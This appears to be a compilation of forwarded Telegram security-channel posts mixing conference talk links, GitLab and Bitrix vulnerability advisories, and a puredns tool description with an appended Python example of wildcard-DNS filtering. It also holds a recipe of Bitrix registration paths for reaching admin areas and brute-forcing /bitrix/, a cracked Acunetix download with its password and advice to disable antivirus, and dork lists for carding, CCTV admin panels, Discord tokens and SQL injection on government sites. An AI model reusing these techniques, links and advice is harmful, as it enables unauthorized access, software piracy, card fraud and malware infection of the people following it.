Forwarded from Кавычка (Bo0oM)
#bitrix
Long story short: sometimes you can get into the Bitrix admin panel just by registering.
Many sites have no registration button at all, but that doesn't stop you from calling the standard forms:
/auth/?register=yes
/crm/?register=yes
/auth/oauth2/?register=yes
The forms don't even have to exist, by the way; it's enough to solve the captcha (if there is one at all) and send a POST request to the registration endpoint.
Besides the standard paths, there are also the demo projects:
/bitrix/wizards/bitrix/demo/public_files/ru/auth/index.php?register=yes
/bitrix/wizards/bitrix/demo/modules/examples/public/language/ru/examples/custom-registration/index.php
/bitrix/wizards/bitrix/demo/modules/examples/public/language/ru/examples/my-components/news_list.php?register=yes
/bitrix/wizards/bitrix/demo/modules/subscribe/public/personal/subscribe/subscr_edit.php?register=yes
Or you can try calling similar modules:
/bitrix/modules/bitrix.siteinfoportal/install/wizards/bitrix/infoportal/site/public/ru/personal/profile/index.php?register=yes
/bitrix/modules/bitrix.siteinfoportal/install/wizards/bitrix/infoportal/site/public/ru/board/my/index.php?register=yes
After registering (having obtained a valid session identifier), you can brute-force the /bitrix/ directory with the following files.
Forwarded from Caster
Caster - MikroTik Nightmare (LIVE SET)
Genre: Offensive
Subgenre: Security Issues, Penetration Testing, Pivoting, Experimental, Post-Exploitation
Label: OFFZONE 2023
Release Date: 24 August 2023
https://www.youtube.com/watch?v=hkl1arlmedw
YouTube preview: Caster, MikroTik Nightmare
Caster, network security expert
An original offensive-genre study of the security of MikroTik equipment. It covers security weaknesses in RouterOS, pivoting and post-exploitation techniques, MitM attacks, traffic hijacking, and…
Forwarded from OFFZONE
Hi. Are you asleep?)
We've just posted the talk recordings and their slides:
— Track 1,
— Track 2,
— Community Track,
— AppSec.Zone,
— AntiFraud.Zone,
— CTF.Zone.
Save them and share them with your friends!
YouTube preview: Omar Ganiev, Hack The Old Way Cannot Hack The New Way
Omar Ganiev, founder, DeteAct
Cybersecurity is a derivative of technology. New technologies create new threats and new attack vectors.
This iterative progress often happens without us noticing. Looking back…
Forwarded from Волосатый бублик
[ GITLAB ]
CVE-2023-5009 (CVSS v3.1 score: 9.6)
https://www.bleepingcomputer.com/news/security/gitlab-urges-users-to-install-security-updates-for-critical-pipeline-flaw/
Forwarded from Pwn3rzs
Acunetix v23.8.230905089 - 05 Sep 2023
Windows:
https://ponies.cloud/scanner_web/acunetix/Acunetix-v23.8-Windows-Pwn3rzs-CyberArsenal.rar
Password: Pwn3rzs
Setup: See README.txt
Enjoy!
NOTE:
The issue "job_not_found" seemed to be caused by Defender in place, since the binary is packed to avoid leechers / skids.
You should add it to exceptions (best solution) or disable AV (not really good)
Changelog:
Too long for post, refer here:
https://www.acunetix.com/changelogs/acunetix-premium/v23-8-230905089-5-september-2023/
Forwarded from C.I.T. Security
Github dorks
https://github.com/techgaun/github-dorks
https://github.com/jcesarstef/ghhdb-Github-Hacking-Database
https://github.com/H4CK3RT3CH/github-dorks
https://github.com/Vaidik-pandya/Github_recon_dorks/blob/main/gitdork.txt (for finding files)
Shodan dorks
https://github.com/blaCCkHatHacEEkr/PENTESTING-BIBLE/blob/master/1-part-100-article/google/Shodan%20Queries.txt
https://github.com/humblelad/Shodan-Dorks
https://github.com/AustrianEnergyCERT/ICS_IoT_Shodan_Dorks
https://github.com/lothos612/shodan
https://github.com/jakejarvis/awesome-shodan-queries
https://github.com/IFLinfosec/shodan-dorks
https://www.osintme.com/index.php/2021/01/16/ultimate-osint-with-shodan-100-great-shodan-queries/
Netlas dorks
https://github.com/netlas-io/netlas-dorks
Censys dorks
https://github.com/thehappydinoa/awesome-censys-queries
Virus Total dorks
https://github.com/Neo23x0/vti-dorks
Binary Edge + Shodan + Google
https://github.com/iGotRootSRC/Dorkers
Google, Bing, Ecosia, Yahoo or Yandex
https://github.com/Zarcolio/sitedorks
Google dorks
https://github.com/BullsEye0/google_dork_list
https://github.com/sushiwushi/bug-bounty-dorks
https://github.com/rootac355/SQL-injection-dorks-list
https://github.com/unexpectedBy/SQLi-Dork-Repository
https://github.com/thomasdesr/Google-dorks
https://github.com/arimogi/Google-Dorks
https://github.com/aleedhillon/7000-Google-Dork-List
Onion dorks
Dorks for searching .onion sites saved in online proxy services https://github.com/cipher387/Dorks-collections-list/blob/main/onion.txt
CCTV dorks
Dorks for searching CCTV camera admin panels https://github.com/cipher387/Dorks-collections-list/blob/main/cctv.txt
Camera dorks from @tru_1veresk https://github.com/iveresk/camera_dorks/blob/main/dorks.json
Google Dorks of Live Webcams, CCTV etc. (from d4msec) https://d4msec.wordpress.com/2015/09/05/google-dorks-of-live-webcams-cctv-etc-google-unsecured-ip-cameras/
Backlink dorks
List https://github.com/alfazzafashion/Backlink-dorks
Explanation https://www.techywebtech.com/2021/08/backlink-dorks.html
1150 dorks for forum hunting https://www.blackhatworld.com/seo/get-backlinks-yourself-1150-dorks-for-forum-hunting.380843/
Token dorks
Discord Bots Tokens https://github.com/traumatism/get-discord-bots-tokens-with-google
Hidden files dorks
Universal for Google, Bing etc
https://github.com/0xAbbarhSF/Info-Sec-Dork-List/blob/main/hidden_files_dork.txt
Admin panel dorks
https://github.com/cyberm0n/admin-panel-dorks/blob/main/dorks.txt
SQL injection dorks
SQL injection dorks for government sites https://github.com/readloud/Google-Hacking-Database-GHDB/blob/main/sql_gov_dorks.txt
SQL injection dorks 2019 https://github.com/readloud/Google-Hacking-Database-GHDB/blob/main/sqli_dork_2019.txt
Linkedin dorks (Google X-Ray search for Linkedin)
Linkedin X-Ray search queries and tools https://github.com/krlabs/linkedin-dorks
Carding dorks
1170 carding dorks https://pastebin.com/GYXLqgU0
17K carding dorks 2019 https://pastebin.com/fgdZxy74
Gaming dorks
7K Gaming Dorks From My Shop https://pastebin.com/ajuixpY2
Minecraft https://pastebin.com/ssNgdTkC
Shopping dorks
10k Amazon dorks https://pastebin.com/1HrmzFre
820 shopping Dorks for SQLi https://pastebin.com/1kED1FDX
Cryptocurrency dorks
15K dorks to find vulnerable pages related to cryptocurrency exchanges, cryptocurrency payments, etc. https://www.scribd.com/document/384770530/15k-Btc-Dorks
18K Bitcoin and other cryptocurrency related dorks https://pdfcoffee.com/18k-bitcoin-dorks-list--3-pdf-free.html
Bug Bounty Dorks
https://github.com/hackingbharat/bug-bounty-dorks-archive/blob/main/bbdorks
https://github.com/Vinod-1122/bug-bounty-dorks/blob/main/Dorks.txt
GIT files Dorks
https://github.com/Proviesec/google-dorks/blob/main/google-dorks-for-git-files.txt
Log files Dorks
https://github.com/Proviesec/google-dorks/blob/main/google-dorks-best-log.txt
CMS Dorks
Wordpress https://pastebin.com/A9dsmgHQ
Magento https://pastebin.com/k75Y2QhF
Joomla https://pastebin.com/vVQFTzVC
Cloud instance dorks
Forwarded from Кавычка (Bo0oM)
#bitrix 🚨 🚨 🚨
A vulnerability in the landing module of the 1C-Bitrix: Site Management CMS that allows an attacker to execute OS commands on the vulnerable host, take control of its resources and penetrate the internal network.
Bitrix > 23.850.0
RCE, CVSS 10/10
Remove the landing module if it is not used. Update to version 23.850.0 or later if it is used.
BDU:2023-05857
So, guys, anime?
#pentest #web
In light of recent events, in case someone is planning to surprise us with new vulnerabilities in Bitrix, here are the sources:
https://gitlab.com/alexprowars/bitrix/-/tree/master
GitLab preview: Aleksey Bobkov / bitrix, 1C-Bitrix version history
#pentest #web
puredns
puredns is a fast domain resolver and subdomain bruteforcing tool that can accurately filter out wildcard subdomains and DNS poisoned entries.
It uses massdns, a powerful stub DNS resolver, to perform bulk lookups. With the proper bandwidth and a good list of public resolvers, it can resolve millions of queries in just a few minutes. Unfortunately, the results from massdns are only as good as the answers provided by the public resolvers. The results are often polluted by wrong DNS answers and false positives from wildcard subdomains.
Examples of usage:
puredns resolve domains.txt
puredns bruteforce wordlist.txt domain.com --resolvers public.txt
cat domains.txt | puredns resolve
GitHub preview: d3mondev/puredns
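The wildcard-subdomain filtering that the puredns post above describes, shown as an added example (this is not code from the puredns project). The idea generalizes beyond puredns: resolve a few random labels under each parent domain, and any answer those random labels return is a wildcard answer; a candidate whose every record is explained by the wildcard is noise. The resolver here is a constructed in-memory table so the script runs offline; `fake_resolve`, the zone data and the 198.51.100.x / 203.0.113.x addresses are all made up for the example.

```python
"""Wildcard-subdomain filtering of the kind puredns performs.

Added example for the puredns post; it is not code from the puredns project.
The resolver is a constructed in-memory table so it runs offline; swap
`fake_resolve` for a real lookup (e.g. dnspython) to use it on live data.
"""
import random
import string
from typing import Callable, Dict, Iterable, Optional, Set

# A resolver maps a name to its set of A records, or None for NXDOMAIN.
Resolver = Callable[[str], Optional[Set[str]]]

# Constructed zone data (not real hosts). example.com has a wildcard record
# that answers 203.0.113.9 for any unknown label; "api" and "www" have their
# own records; "mail" is a real host that happens to share the wildcard address.
_FAKE_RECORDS: Dict[str, Set[str]] = {
    "api.example.com": {"198.51.100.20"},
    "www.example.com": {"198.51.100.10", "198.51.100.11"},
    "mail.example.com": {"203.0.113.9"},
}
_FAKE_WILDCARDS: Dict[str, Set[str]] = {"example.com": {"203.0.113.9"}}


def fake_resolve(name: str) -> Optional[Set[str]]:
    """Constructed stand-in for a DNS lookup; returns None when the name does not exist."""
    if name in _FAKE_RECORDS:
        return _FAKE_RECORDS[name]
    for parent, answer in _FAKE_WILDCARDS.items():
        if name.endswith("." + parent):
            return answer
    return None


def random_label(length: int = 12) -> str:
    """A label that is vanishingly unlikely to exist unless the zone is a wildcard."""
    return "".join(random.choices(string.ascii_lowercase + string.digits, k=length))


def detect_wildcard(parent: str, resolve: Resolver, probes: int = 3) -> Set[str]:
    """Resolve a few random labels under `parent`; any answers they return are wildcard answers."""
    answers: Set[str] = set()
    for _ in range(probes):
        rr = resolve(f"{random_label()}.{parent}")
        if rr:
            answers |= rr
    return answers


def filter_wildcards(candidates: Iterable[str], resolve: Resolver,
                     probes: int = 3) -> Dict[str, Set[str]]:
    """Resolve each candidate and drop those whose answers are all explained by a wildcard.

    The wildcard check is done per parent domain and cached, so sub-subdomains
    (a.b.example.com) are compared against the wildcard of their own parent.
    """
    wildcard_cache: Dict[str, Set[str]] = {}
    kept: Dict[str, Set[str]] = {}
    for name in candidates:
        rr = resolve(name)
        if not rr:
            continue  # NXDOMAIN: nothing to keep
        parent = name.split(".", 1)[1] if "." in name else name
        if parent not in wildcard_cache:
            wildcard_cache[parent] = detect_wildcard(parent, resolve, probes)
        if wildcard_cache[parent] and rr <= wildcard_cache[parent]:
            continue  # every answer is a wildcard answer: almost certainly noise
        kept[name] = rr
    return kept


if __name__ == "__main__":
    names = ["api.example.com", "www.example.com", "mail.example.com",
             "ghost.example.com", "gone.other.com"]
    for host, records in filter_wildcards(names, fake_resolve).items():
        print(host, sorted(records))
```

Note the failure mode the constructed data deliberately includes: mail.example.com is a real host, but because its only record is the wildcard address it is indistinguishable from wildcard noise and gets dropped. That is the trade-off behind the "accurately filter out" claim: filtering by answer set removes false positives at the cost of hosts that share the wildcard address, which is why puredns-style tools also cross-check with multiple trusted resolvers before discarding a name.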